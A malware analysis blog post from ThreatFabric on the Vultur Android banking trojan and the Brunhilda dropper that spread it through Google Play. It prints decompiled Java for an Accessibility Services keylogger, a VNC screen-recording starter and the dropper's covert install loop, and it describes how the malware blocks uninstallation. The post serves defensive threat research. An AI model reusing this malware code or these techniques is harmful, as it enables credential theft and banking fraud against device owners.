The droppers on Google Play posed as some utility applications like fitness apps and 2FA authenticators. However, in addition to performing their advertised functionality, they installed banking malware on the victim’s device. Later, in December 2020, PRODAFT revealed more details about the dropper and called it Brunhilda, which at the time of their analysis was also distributing Alien banking malware. It was still masquerading as fitness and authentication applications on Google Play. In March 2021, ThreatFabric’s CSD detected previously unknown malware with RAT capabilities that we named Vultur. While investigating the new threat, ThreatFabric analysts were able to connect it with the Brunhilda dropper. In this blog we will cover Vultur and discuss the Brunhilda dropper to show they are connected and operated by a private group using their own dropper to distribute different malware.

Here comes Vultur

The vulture is a large bird of prey that specializes in attacking and feeding on weak and helpless animals. These predators keep their eyes on their preys for a long time before making a move, which happens only when they are sure the attack is lethal and successful. Vultur, a new Android banking Trojan discovered by ThreatFabric in March 2021, operates in a very similar way. Just like these big birds, this trojan observes everything that is happening on the devices using a screen recording feature based on VNC to obtain all the PII (Personal Identifiable Information) needed to perform fraud, such as banking account username, password and access tokens.

The ThreatFabric team was able to find at least 2 dropper applications connected to Vultur, one of them having 5000+ installations from Google Play. Thus, we estimate the number of potential victims to be in the thousands.

Capabilities & Commands

Modus Operandi

Vultur approaches banking fraud with a Modus Operandi that is in some way different from what we usually see from Android banking trojans. The usual banking trojan MO heavily relies on abusing the overlay mechanic to trick victims into revealing their passwords and other important private information. In an overlay attack, users type their credentials in what they think is a legitimate banking app, effectively giving them to a page controlled by the attacker. Vultur, on the other hand, uses a less technically flexible yet very effective technique: screen recording.

Accessibility Services

Like the large majority of banking trojans, Vultur heavily relies on Accessibility Services. When it is first started the malware hides its app icon and right after abuses the services to obtain all the necessary permissions to operate properly. It is worth noting that the application requests for Accessibility Service access showing a WebView overlay borrowed from other malware families. In fact, the first time we saw this WebView was with Alien banking malware.

Whenever any new event triggers the Accessibility Event service, the bot checks if it is coming from an application that is part of the list of keylogging targets. If so, then it uses the Accessibility Services to log everything typed by the user.

public static void keylog(AccessibilityEvent event) {
    String data;
    if (!keyLoggerManager.KeyloggerActive) {
        return;
    }
    String v1 = event.getPackageName() == null ? "Unknown" : event.getPackageName().toString();
    if (AcService.keyloggerManager.isPkgKeylogged(v1)) {
        return;
    }
    try {
        new SimpleDateFormat("MM/dd/yyyy, HH:mm:ss z", Locale.US).format(Calendar.getInstance().getTime());
        if (!v1.equals(keyLoggerManager.packageName)) {
            if (keyLoggerManager.dataToBeSent.length() != 0) {
                keyLoggerManager.formattedData = keyLoggerManager.formattedData + keyLoggerManager.packageName + " | " + keyLoggerManager.dataToBeSent + "\\n";
            }

            keyLoggerManager.packageName = v1;
            keyLoggerManager.dataToBeSent = "";
        }
        int v12 = event.getEventType();
        if (v12 == 1) {
            data = event.getText().toString();
        } else {
            if (v12 != 16) {
                return;
            }
            data = event.getText().toString();
        }
        if (keyLoggerManager.replaceNumbersFlag) {
            data = data.replaceAll("[^0-9]", "");
        }
        if (data.length() != 0) {
            keyLoggerManager.dataToBeSent = keyLoggerManager.dataToBeSent + data;
            return;
        }
    } catch (Exception v0) {
        return;
    }
}

In addition to keylogging the services are used to stop the user from deleting the application from the device using the traditional procedures, like going into the settings and manually uninstalling the application. Whenever the user reaches the app details screen, the bot automatically clicks the back button, sending the user to the main settings screen, effectively not allowing access to the uninstall button.

Screen Recording

After hiding its icon, Vultur proceeds to start its service responsible for managing the main functionality of the trojan, which is screen recording using VNC (Virtual Network Computing). VNC is a specific software implementation, but it is not uncommon for malicious actors to use the term ‘VNC’ to refer to anything falling under the umbrella of Screen Sharing with remote access (may that be done using a third-party software like VNC or TeamViewer, or through Android internal features, used by for example the Oscorp malware). In the case of Vultur it actually refers to a real VNC implementation taken from AlphaVNC. To provide remote access to the VNC server running on the device, Vultur uses ngrok. ngrok is capable of exposing local servers behind NATs and firewalls to the public internet over secure tunnels.

It is obligatory to point out that AlphaVNC and ngrok are legitimate and legal products; however, like many other Android banking trojans, Vultur’s creators had no remorse in abusing them to steal PII from its victims.

The main VNC-like features are implemented in native code. All the functionalities, like for example the function nstart_vnc() in the code below, are included in the libavnc.so library, which is interfaced to the application using a wrapper class.

public static void startVnc(FileDescriptor fileDescriptor, VncSessionConfig config, o arg12, int arg13, int arg14, int arg15) {
    C2Commands.log("VNC: START VNC SERVICE");
    LvWrapper._instance.config = config;
    LvWrapper._instance.hThread = new HandlerThread("nUt");
    LvWrapper._instance.hThread.start();
    LvWrapper._instance.rThread = new HandlerThread("rCt");
    LvWrapper._instance.rThread.start();
    LvWrapper._instance.startThread = new Thread(new Runnable() {
        @Override
        public void run() {
            String v5 = config.getPw();
            int v6 = config.getVncPort();
            C2Commands.log("VNC: EXIT CODE = " + LvWrapper._instance.nstart_vnc(fileDescriptor, arg13, arg14, arg15, v5, v6));
            ((a.a.a.ScreenCapture.a) arg12).a();
        }
    });
    LvWrapper._instance.startThread.start();
}

The biggest threat that Vultur offers is its screen recording capability. The trojan uses Accessibility Services to understand what application is in the foreground. If the application is part of the list of targets, it will initiate a screen recording session.

If the user pays attention to the notification panel, he would also be able to see that Vultur, in this case masquerading as an app called “Protection Guard”, is projecting the screen.

Communication

C2 Methods

Below is a complete list of the methods supported by the bot. These are the commands that the bot can send to the C2 to request, or to send back, information:

FCM Commands

Below is a complete list of the commands that the bot can receive via FirebaseCloudMessaging:

C2 paths

These are the endpoints reachable on the C2:

Targets

Vultur contains two sets of targets: screen recording and keylogging. The first list reported in the appendix includes all the applications that will be victim of screen recording using AlphaVNC, while the second list includes all the applications targeted by the keylogging feature. The following chart shows the number of targeted banking applications per country (applications of cryptocurrency wallets and social applications are shown separately):

Brunhilda

Based on the intelligence gathered through our MTI (Mobile Threat Intelligence) Portal and live detections identified via our CSD (Client Side Detection) solution, ThreatFabric was able to link this Vultur campaign with Brunhilda. Brunhilda is a privately operated dropper that has been previously observed dropping Alien.A. The sample analyzed in this section was found on the Google Play Store, but it has been removed at the time of writing.

This particular sample has 5.000+ installs, while the overall number victims of Brunhilda group is estimated to be over 30.000 based on the Google Play and unofficial application store statistics (some of the droppers have 10.000+ installations). This dropper is using the same icon, package name and C2 as a Vultur sample. In addition, ThreatFabric discovered that the “Brunhilda Project” C2 is extended with new capabilities to operate Vultur specific bot commands.

Dropper Functionality

The dropper apps contain their advertised functionality, meaning the users can use the app as they expect. In the background however it registers the device to its C2 server, and if the necessary pre-requisites are met, the dropper can download an APK file and install it as an update to the current application. This is in line with the fact that ThreatFabric identified Vultur campaigns using the same icon and package name as the dropper. Underneath is the section of code that updates the package with the new APK.

public final void Install() {
    ((PowerManager) this.getSystemService("power")).newWakeLock(1, "wl:2").acquire();
    this.f(100);
    b v0 = new b(this);
    v0.a();
    while (SPUtils.getState() < 8) {
        if (SPUtils.getState() < 6) {
            try {
                Thread.sleep(500 L);
            } catch (InterruptedException v1) {
                v1.printStackTrace();
            }
            continue;
        }
        f0.installPackage();
        try {
            Thread.sleep(500 L);
        } catch (InterruptedException v1_1) {
            v1_1.printStackTrace();
        }

        new Thread(h.b).start();
    }
    this.stopAll();
    v0.unregisterReceiver();
}

Upon the launch of the application, a registration request is sent to the C2 server using the gRPC framework. The request contains basic information about the device and dropper application that can be used to selectively target specific victims: package name of the dropper, Android version, device model, and OS language.

As a response it receives an appToken as a registration ID. This appToken is later used in the following requests to identify the device. Shortly after registration, the dropper requests for additional configuration and saves in under the mcfg and info:pld fields in SharedPreferences. info:pld contains the information about the application to be downloaded and installed: package name, size, chunks and XOR key used to decrypt downloaded data. Once the application data has been downloaded and decrypted the installation procedure will be started.

Comparisons and Connections

Old vs new Brunhilda

When we compare this dropper to one of the previously used samples we see strong similarities between them. Older versions use JSON-RPC instead of gRPC, but the flow and data sent is almost identical:

In addition we identified code reuse in other places, such as in the code that processes the information on the application to download, which contained some parameters that were present in both samples but not used in the newer one.

Brunhilda vs Vultur

Other evidence of the connection between Brunhilda and Vultur is that we saw Vultur using the same C2 as the Brunhilda has used in the past. Moreover, Vultur also uses JSON-RPC to communicate with its C2 just like old versions of the dropper:

Conclusion

The story of Vultur shows again how actors shift from using rented Trojans (MaaS) that are sold on underground markets towards proprietary/private malware tailored to the needs of the actor. It enables us to observe a group that covers both processes of distribution and operation of malicious software.

Banking threats on the mobile platform are no longer only based on well-known overlay attacks, but are evolving into RAT-like malware, inheriting useful tricks like detecting foreground applications to start screen recording. This brings the threat to another level, as such features open the door for on-device fraud, circumventing detection based on phishing MO’s that require fraud to be performed from a new device: With Vultur fraud can happen on the infected device of the victim. These attacks are scalable and automated since the actions to perform fraud can be scripted on the malware backend and sent in the form of sequenced commands.

As the mobile channels of financial institutions continue to grow, mobile banking malware will only become more popular. Besides a steep increase in mobile malware volumes targeting banking apps last and this year, we see mobile malware becoming more and more sophisticated enabling hard-to-detect large scale attacks. This means that financial institutions should consider preparing themselves by better understanding the risk posed to their mobile-first strategy based on the current mobile threat landscape.

CSD & MTI

ThreatFabric makes it easier than it has ever been to run a secure mobile payments business. With the most advanced threat intelligence for mobile banking, financial institutions are able to build a threat-driven mobile security strategy and use this unique knowledge to detect financial fraud on the mobile devices of their customers in real-time.

Together with our customers and partners, we are building an easy-to-access information system where financial institutions have more visibility on their mobile banking threats in order to protect their end customers.

You can request our free trial for our MTI feed for the following TIPs:

• Anomali
• ThreatConnect
• ThreatQuotient

If you want more information on how our MTI and CSD solutions can help your organization, feel free to contact us at: sales@threatfabric.com

Appendix

Brunhilda Dropper

Vultur

Screen recording targets

Keylogging targets